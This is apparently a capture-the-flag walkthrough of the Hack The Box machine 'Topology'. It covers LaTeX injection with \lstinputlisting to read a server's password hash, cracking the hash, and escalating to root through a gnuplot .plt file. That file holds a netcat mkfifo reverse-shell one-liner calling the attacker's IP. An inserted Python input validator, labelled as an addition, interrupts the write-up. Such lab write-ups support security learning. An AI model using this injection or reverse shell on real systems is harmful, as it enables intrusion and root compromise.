TOPOLOGY HTB




Hey Hackers!

  “You will prosper if you focus on yourself, compete with yourself and challenge yourself to be a better person.”

                                                                            ― Happiness Shuma      


Topology is an easy-level machine on Hack The Box. The challenging part is getting user privileges; the privilege escalation part is usual and common.

Enumeration

Call your friend Nmap to check the ports and services of the machine.


As usual, check the web server after adding the IP address to /etc/hosts: 10.10.11.217 topology.htb

SUBDOMAIN ENUMERATION


Here we found two subdomains, stats and dev.

Add 10.10.11.217 dev.topology.htb to /etc/hosts.

WEBSERVER


Go click LaTeX Equation Generator 


Latex Equation 
 
LaTeX Equation Generator: LaTeX is a typesetting system for mathematical notation; we don't need to go in depth on it. The generator converts the input (a mathematical expression) into output in PNG format. So we are going to try LaTeX injection here by manipulating the GET request in the browser. If you want to know more about LaTeX injection, the reference link is at the end of the writeup.


LATEX INJECTION


And you will be redirected to the webpage shown below.


TO READ A FILE: \lstinputlisting{} -- inside the curly braces you give the path of the file you want to read.

In addition, enclose it in $ delimiters.

And finally hit the Generate button.


Respective output for the given input
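The input that reaches the generator is where this gets stopped. As an added example (not part of the original writeup or of the machine's code), here is an allowlist check for equation input that rejects \lstinputlisting and every other macro outside a small math set; the macro list, the function name and the length limit are assumptions.

```python
import re

# Assumption: the generator wraps the input in math mode itself and only needs
# these math macros. The list is illustrative; extend it deliberately.
ALLOWED_MACROS = frozenset({
    "frac", "sqrt", "sum", "prod", "int", "lim", "infty", "cdot", "times",
    "pm", "le", "ge", "neq", "approx", "left", "right", "sin", "cos", "tan",
    "log", "ln", "alpha", "beta", "gamma", "delta", "theta", "lambda", "pi",
})
# Control symbols (backslash + one non-letter) that only affect spacing/braces.
ALLOWED_SYMBOLS = frozenset(",;:! {}")
# '$' toggles math mode, '%' starts a comment, '#' is the macro parameter char.
FORBIDDEN_CHARS = "$%#"
# With default catcodes a control word is a backslash followed by letters only;
# anything else after a backslash is a one-character control symbol.
CONTROL_SEQ = re.compile(r"\\([A-Za-z]+|.?)")


def validate_equation(src, max_len=300):
    """Return (ok, reason) for user-supplied equation source."""
    if len(src) > max_len:
        return False, "input too long"
    if not all(0x20 <= ord(c) < 0x7F for c in src):
        return False, "only printable ASCII is accepted"
    if "^^" in src:
        # TeX's ^^ notation can stand in for any character, so a macro name
        # written that way would never reach the allowlist check below.
        return False, "^^ character notation is not accepted"
    for ch in FORBIDDEN_CHARS:
        if ch in src:
            return False, f"character {ch!r} is not accepted"
    for m in CONTROL_SEQ.finditer(src):
        name = m.group(1)
        if name == "":
            return False, "dangling backslash"
        if name.isalpha():
            if name not in ALLOWED_MACROS:
                return False, f"macro \\{name} is not on the allowlist"
        elif name not in ALLOWED_SYMBOLS:
            return False, f"control symbol \\{name} is not on the allowlist"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs; the file path is a placeholder.
    for sample in (r"\frac{x+5}{y-3}", r"\lstinputlisting{/path/to/file}"):
        print(sample, "->", validate_equation(sample))
```

Input validation is one layer only: running the TeX engine with -no-shell-escape and with openin_any = p in texmf.cnf limits what a macro that slips through can read or execute.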

Subdomain { dev.topology.htb }


Let's check the hosting service using Wappalyzer.


So an idea came to my mind.


Hope you got it too!

Yes, we can place this exact location in the GET request of the LaTeX generator to view the password credential for the webpage that is requesting authentication.

 
latex injection

After injecting the payload, let's hit the Generate button.


There you get the password hash for the user vdaisley:$apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0

Let's crack the hash using the John the Ripper tool.


Try the credentials over SSH.

SSH CREDENTIAL 

user: vdaisley
password: calculus20

USER FLAG 




Privilege Escalation


Run bash linpeas.sh

Linpeas


As mentioned below, most of the time /opt will be empty, but this time I got the gnuplot directory; gnuplot is software used to plot measurements in LaTeX. By searching on Google, I found that just placing a customized file with the extension *.plt there will make it run automatically with root privileges.


So I created a one-line command to get the root shell.


command : echo "system 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your machine IP> 1234 >/tmp/f'" > /opt/gnuplot/hack.plt

Before running the above command, don't forget to run a listener on your system with Netcat, as I mentioned in the above screenshot.

Thank you for reading my writeup.

Stay tuned for the next exciting writeup, which will be posted in the upcoming days.


REFERENCES:


https://book.hacktricks.xyz/pentesting-web/formula-doc-latex-injection#latex-injection

http://www.gnuplot.info/docs_4.2/node327.html
